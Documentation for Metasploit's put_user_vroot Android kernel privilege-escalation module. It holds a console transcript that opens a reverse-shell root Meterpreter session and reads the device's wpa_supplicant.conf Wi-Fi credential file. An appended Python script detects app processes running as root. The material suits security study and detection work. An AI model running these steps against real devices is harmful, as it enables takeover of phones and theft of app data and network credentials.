
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/android/local/put_user_vroot.md

## Introduction

This module exploits a vulnerability in the Linux kernel on an Android device that allows an untrusted app to elevate to root privileges. On Android each application normally runs as its own Linux user, which sandboxes it from the Android system and from other applications. After the exploit has run, the resulting session has full privileges on the device and can access the entire filesystem, including the private data files of every other app and of system apps.

The exploit first uses a kernel memory read primitive to determine the correct offsets for the device, then uses the write primitive to overwrite the fsync handler of the ptmx file operations with a function that elevates the current process to root. Finally /dev/ptmx is opened and fsync is called on it to trigger the exploit.

This exploit should work on any vulnerable device and is not device-specific. In the example below, a Samsung Galaxy S4 running Android version 4.3 was targeted.

## Usage

You'll first need to obtain a session on the target device. Once the module is loaded, set the SESSION option and configure the handler. The exploit can take a while to run on the device, so the module's WfsDelay option is set to wait 120 seconds for a session. If no session has been opened after this time, you can assume the device is not vulnerable.

An example session follows:

```
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                        Information           Connection
  --  ----                        -----------           ----------
  1   meterpreter dalvik/android  u0_a132 @ localhost   192.168.1.52:4444 -> 192.168.1.54:33549 (192.168.1.54)

msf exploit(handler) > use exploit/android/local/put_user_vroot
msf exploit(put_user_vroot) > set LHOST 192.168.1.52
LHOST => 192.168.1.52
msf exploit(put_user_vroot) > set LPORT 5555
LPORT => 5555
msf exploit(put_user_vroot) > set SESSION 1
SESSION => 1
msf exploit(put_user_vroot) > run

[*] Started reverse TCP handler on 192.168.1.52:5555
[*] Loading exploit library /data/data/com.metasploit.stage/files/bwycy
[*] Loaded library /data/data/com.metasploit.stage/files/bwycy, deleting
[*] Waiting 120 seconds for payload
[*] Sending stage (388156 bytes) to 192.168.1.54
[*] Meterpreter session 2 opened (192.168.1.52:5555 -> 192.168.1.54:59580) at 2016-12-24 00:19:12 +0800

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > cat /data/misc/wifi/wpa_supplicant.conf
ctrl_interface=wlan0
...
```
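The session above shows the defender-relevant symptom of this class of exploit: the app that started as the sandboxed user `u0_a132` ends up with a process whose uid is 0. The following script is an added example (not part of the Metasploit module or its documentation) that walks a process listing and flags app-package processes owned by root. The `USER PID NAME` layout, the package-name pattern and the sample listing are all constructed assumptions for illustration; real Android `ps` output has more columns and varies between versions, so the parser would need adjusting before use against real data.

```python
"""Flag Android app processes that are running as root.

Added example, not part of the put_user_vroot module or its documentation.
On Android every installed app normally runs under its own Linux uid
(shown as u0_aNNN by ps), so an app-package process owned by root is a
strong indicator of a local privilege escalation such as the one this
module performs. The listing format below (USER PID NAME) is a constructed,
simplified ps-style layout used only for this illustration.
"""
import re
from typing import Dict, List, Set, Tuple

# Assumption: app process names look like reverse-DNS package identifiers,
# optionally followed by a ":process" suffix (e.g. com.example.app:remote).
PACKAGE_RE = re.compile(r"^[a-z][a-z0-9_]*(\.[a-z][a-z0-9_]*)+(:[\w.]+)?$")

# Constructed sample listing. The last two rows model app packages whose
# processes are owned by root instead of their own sandbox uid.
SAMPLE_PS = """\
USER     PID   NAME
root     1     /init
system   512   system_server
u0_a132  2231  com.metasploit.stage
u0_a40   2310  com.android.chrome
root     2402  com.metasploit.stage
root     2455  com.example.flashlight:remote
"""


def parse_ps(listing: str) -> List[Tuple[str, int, str]]:
    """Parse a 'USER PID NAME' listing into (user, pid, name) tuples, skipping the header."""
    rows = []
    for line in listing.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3 or parts[1] == "PID":
            continue
        user, pid, name = parts
        rows.append((user, int(pid), name))
    return rows


def find_rooted_app_processes(listing: str) -> List[Tuple[int, str]]:
    """Return (pid, name) for processes that look like app packages but run as root."""
    hits = []
    for user, pid, name in parse_ps(listing):
        if PACKAGE_RE.match(name) and user == "root":
            hits.append((pid, name))
    return hits


def summarize_app_users(listing: str) -> Dict[str, Set[str]]:
    """Map each app package to the set of users its processes run as.

    A package that appears under both its own u0_aNNN uid and root is the
    pattern seen in the session transcript: the original app process keeps
    its sandbox uid while the spawned payload process has uid 0.
    """
    users: Dict[str, Set[str]] = {}
    for user, _pid, name in parse_ps(listing):
        if PACKAGE_RE.match(name):
            package = name.split(":", 1)[0]
            users.setdefault(package, set()).add(user)
    return users


if __name__ == "__main__":
    for pid, name in find_rooted_app_processes(SAMPLE_PS):
        print(f"ALERT pid={pid} {name} is running as root")
    for package, owners in summarize_app_users(SAMPLE_PS).items():
        if len(owners) > 1:
            print(f"NOTE {package} runs under several users: {sorted(owners)}")
```

Run on the sample listing, the script alerts on pids 2402 and 2455 and notes that `com.metasploit.stage` runs under both `u0_a132` and `root`. Processes such as `/init` and `system_server` are ignored because they do not look like app packages, which keeps legitimately root-owned platform daemons out of the alert list.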